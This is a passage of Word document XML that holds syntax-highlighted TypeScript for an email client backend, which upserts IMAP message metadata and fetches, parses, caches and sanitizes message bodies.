          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">          {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            $setOnInsert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              folderId</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resolveFolderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> folderPath)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              messageId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">messageId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              threadId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">threadId</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envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">messageId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              cc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">envelope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              isRead</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              isStarred</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Flagged'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              hasAttachments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">              headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">headers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 upsert</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        synced</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synced</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lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">release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fetchBody</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccountDoc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> uid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html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sanitized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cacheKey </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`body:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uid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cached </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(cacheKey)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (cached)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(cached)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>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getClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(account)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> lock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getMailboxLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'INBOX'</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msg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fetchOne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { source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 uid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ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostalMime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">source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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> parsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">text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html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> parsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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sanitized</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sanitizeHtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(parsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
